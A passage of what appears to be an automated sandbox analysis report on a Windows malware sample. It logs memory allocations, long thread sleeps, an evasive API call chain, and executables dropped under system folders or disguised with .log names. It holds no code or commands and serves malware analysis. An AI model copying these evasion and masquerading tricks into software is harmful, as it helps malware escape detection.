                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1300000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1AE70000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 960000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1A820000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 990000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1A4D0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 940000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1A5F0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1F60000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 10E0000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1AAC0000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1370000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 780000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1A450000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1590000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599840
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599646
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599109
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598984
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598469
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598333
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597922
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597760
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597625
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597500
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596471
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596094
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595953
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595819
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595703
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595593
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595484
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595375
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595265
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595142
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595015
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594906
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594793
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594578
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594468
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594250
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594140
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594030
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593921
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593751
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593424
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593187
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593078
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592969
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592844
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592624
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592515
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592406
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592172
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592062
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591951
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591843
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591618
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWindow / User API: threadDelayed 3278
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWindow / User API: threadDelayed 6415
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\AjJOuhvp.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\LsbmIiGn.log
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\KSdeeKAW.log
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\atZTrSKs.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\BJIWYGBF.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\qeNySdhc.log
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\mEBzyVHW.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\sgzhoMlY.log
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23511
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 6256Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 5772Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -35971150943733603s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -599840s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -599646s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -599109s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598984s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598875s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598687s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598469s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 3052Thread sleep time: -300000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598333s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597922s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597760s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597625s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597500s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 3052Thread sleep time: -25200000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597359s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596875s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596471s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596281s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596094s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595953s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595819s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595703s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595593s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595484s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595375s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595265s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595142s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595015s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594906s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594793s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594687s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594578s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594468s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594359s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594250s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594140s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594030s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593921s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593751s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593424s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593297s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593187s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593078s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592969s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592844s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592734s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592624s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592515s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592406s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592297s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592172s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592062s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591951s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591843s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591734s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591618s >= -30000s
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 6388Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 6748Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6280Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 7124Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 1700Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 3288Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_008AA69B
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_008BC220
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BE6A3 VirtualQuery,GetSystemInfo,0_2_008BE6A3
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 30000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599840
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599646
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599109
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598984
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598469
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598333
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597922
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597760
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597625
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597500
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596471
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596094
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595953
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595819
